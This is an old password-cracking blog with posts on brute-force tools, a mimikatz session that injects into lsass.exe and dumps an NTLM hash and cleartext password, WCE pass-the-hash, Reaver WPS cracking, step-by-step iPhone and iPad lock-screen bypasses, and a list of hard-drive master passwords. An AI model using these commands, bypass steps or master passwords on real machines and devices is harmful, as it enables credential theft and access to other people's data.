What's My Pass?

OpenCL Multiforcer

admin — Mon, 07 May 2012 18:15:13 +0000

In beta testing for linux right now, only supports NTLM and MD5 right now. But you are able to bruteforce passwords from multiple sources at the same time. Download from here: https://sourceforge.net/projects/cryptohaze/files/New-Multiforcer-Linux_x64_1_31.tar.bz2/download

Crack PDF passwords using BeagleBone

admin — Tue, 03 Apr 2012 19:03:10 +0000

The password protected PDF file is passed to the Beaglebone device on a thumb drive. Since the BeagleBone is running embedded Linux you don’t need to mess around with figuring out how to read from the device. A click of the button starts the process. Currently the code just uses a brute force attack which can test more than 6000 four-character passwords per second on the 700 MHz ARM processor. This is quite slow for any password more than four or five characters long, but [Nuno] does mention the possibility of running several ARM processors in parallel, or using a dictionary (or rainbow table) to speed things up. Either way it’s an interesting project to try on the hardware.
Src: nunoalves.com

MimiKatz – clear text passwords

admin — Thu, 29 Mar 2012 17:27:06 +0000

As you’ve seen in our previous post about WCE, Windows is storing your password to use for wdigest authentication. Your System needs cleartext passwords for Single Sign On with Terminal Server (tspkg provider) and Windows Digest implementation (wdigest provider). Password are not in cleartext in memory, but with the need to have them in plaintext form for SSO, they are cypher in reversible way. wdigest (the password) is required to support HTTP Digest Authentication and other schemes that require the authenticating party to know the password – and not just the hash. Mimikatz is a tool to recover this plain-text password,it saves you time and power needed to brute force a 16 character NTLM password during pen-testing or tech work. You inject a dll into lsass.exe to recover the information needed. The blog and program are in French http://blog.gentilkiwi.com/mimikatz

Below is a demonstration of how to use mimikatz, all commands typed are in red:
(The privilege::debug command is not required if you are already system.)
C:\Mimikatz\x64>mimikatz mimikatz 1.0 x64 (alpha) /* Traitement du Kiwi (Feb 9 2012 01:49:24) */ // http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d’ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 568
Attente de connexion du client…
Serveur connecté à un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi

SekurLSA : librairie de manipulation des données de sécurités dans LSASS

mimikatz # @getLogonPasswords

Authentification Id         : 0;160179
Package d’authentification : NTLM
Utilisateur principal       : Administrator
Domaine d’authentification : TestBox64
        msv1_0 :        lm{ d0e9aee149655a6075e4540af1f22d3b },
ntlm{ cc36cf7a8514893efccd332446158b1a }
        wdigest :       waza1234/
        tspkg :         waza1234/

Windows Credentials Editor (WCE) 1.3 x64 released

admin — Wed, 14 Mar 2012 22:24:43 +0000

Windows Credentials Editor (WCE) allows to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes and Kerberos tickets). This can be used, for example, to perform pass-the-hash on Windows, obtain NT/LM hashes from memory (from interactive logons, services, remote desktop connections, etc.) which can be used to perform further attacks, obtain Kerberos tickets and reuse them in other Windows or Unix systems. Also dumps passwords in plain-text without the need to crack the hashes. Supports Windows XP, 2003, Vista, 7 and 2008.

Current Version: WCE v1.3beta (32-bit) (download) - WCE v1.3beta (64-bit) (download)

Frequently Asked Questions (FAQ) available here.

Estimating Password and Token Entropy in Web Apps

admin — Wed, 22 Feb 2012 20:46:09 +0000

Ryan O’Horo from IOActive has a great article discussing how to estimate password and token entropy using Wolfram Alpha, check it out on IOActive’s Blog

Cracking WPA/WPA2 with Reaver

admin — Tue, 24 Jan 2012 15:57:02 +0000

The WiFi Protected Setup (WPS) protocol is vulnerable to a brute force attack that allows an attacker to recover an access point’s WPS pin, and subsequently the WPA/WPA2 passphrase, in just a matter of hours, using the open source tool called Reaver. Think your 32 character alpha-numeric password is uncrackable? If your wireless router is using WPS then your router may be spit back your password in plain-text to the attacker in less than 10 hrs. WPS allows users to enter an 8 digit PIN to connect to a secured network without having to enter a passphrase. When a user supplies the correct PIN the access point essentially gives the user the WPA/WPA2 PSK that is needed to connect to the network. Reaver will determine an access point’s PIN and then extract the PSK and give it to the attacker. When we tested Reaver in our labs we were able to recovery the WPA password in 1.5hrs and the longest run was 7.5hrs

iPhone iOS 4.3.5 vulnerability

admin — Mon, 12 Dec 2011 15:16:49 +0000

iPhone iOS 4.3.5 vulnerability (pin/password bypass to make calls) from Sigtrap.

Turn on the phone.
Slide to unlock.
Press Emergency Call.
Enter a very long phone number.
Press and hold down the Power button.
Wait for one second.
Press the Call button.
The phone will show the “Slide to power off” screen.
Release the Power button.
Press Cancel.
Double press the Home button.
Press the Phone icon.
Make calls.

How secure is your password?

admin — Mon, 28 Nov 2011 18:04:00 +0000

Just head over to the service’s website and enter a password in the form. You do not necessarily have to enter a password that you use actively. You can alternatively enter a comparable password to find out how long it would take to hack your password with a brute force, or maybe a combined dictionary and brute force attack.

http://www.howsecureismypassword.net/

Bypass IPad 2 passcode with a smart cover

admin — Fri, 21 Oct 2011 04:13:55 +0000

Anyone with a Smart Cover can break into your “password-protected” iPad 2. This issue occurs in iOS 5, but we’re hearing uncorroborated reports of it also working in earlier versions of iOS 4.3.

What the flaw allows:

As you can see in the video above, a Smart Cover can essentially unlock an iPad 2. The person who unlocks your iPad 2 will not have complete access to your iPad, but will be able to gain entrance to whatever you locked your iPad 2 on. If your iPad 2 went to sleep in Mail, Safari, Messages, Contacts, or Maps, you can imagine the sorts of personal information that can be viewed on your iPad. If you left your iPad 2 on its Home screen, the person can view which applications you have on your device, control media from the multitasking bar, but not much else.

How to re-create it:

1) Lock a password protected iPad 2

2) Hold down power button until iPad 2 reaches turn off slider

3) Close Smart Cover

4) Open Smart Cover

5) Click cancel on the bottom of the screen

(src:9to5mac.com)

Hard Drive Master Passwords

admin — Sun, 16 Oct 2011 08:13:09 +0000

Here’s a small compilation of passwords. If you have any to add please email us. We also can crack DELL HDD passwords for $10 ::Here::

SEAGATE -> “Seagate” +25 spaces

MAXTOR
series N40P -> “Maxtor INIT SECURITY TEST STEP ” +1 or +2 spaces
series N40P -> “Maxtor INIT SECURITY TEST STEP F”
series 541DX -> “Maxtor” +24 spaces
series Athena (D541X model 2B) and diamondmax80 -> “Maxtor”

WESTERN DIGITAL -> “WDCWDCWDCWDCWDCWDCWDCWDCWDCWDCWD”

FUJITSU -> 32 spaces

SAMSUNG -> “ttttttttttttttttttttttttttttttttt” (32 times t)

IBM
series DTTA -> “CED79IJUFNATIT” +18 spaces
series DJNA -> “VON89IJUFSUNAJ” +18 spaces
series DPTA -> “VON89IJUFSUNAJ” +18 spaces
series DTLA -> “RAM00IJUFOTSELET” +16 spaces
series DADA-26480 (6,4gb) -> “BEF89IJUF__AIDACA” +15 spaces

HITACHI series DK23AA, DK23BA and DK23CA -> 32 spaces

TOSHIBA -> 32 spaces

For xbox hdds try “XBOXSCENE” or “TEAMASSEMBLY” too

There is also some software available to reset the password called MHDD, another suggested program is ATAPWD. A Commercial tool from HDDLock claims to unlock drives and prices vary with drive size.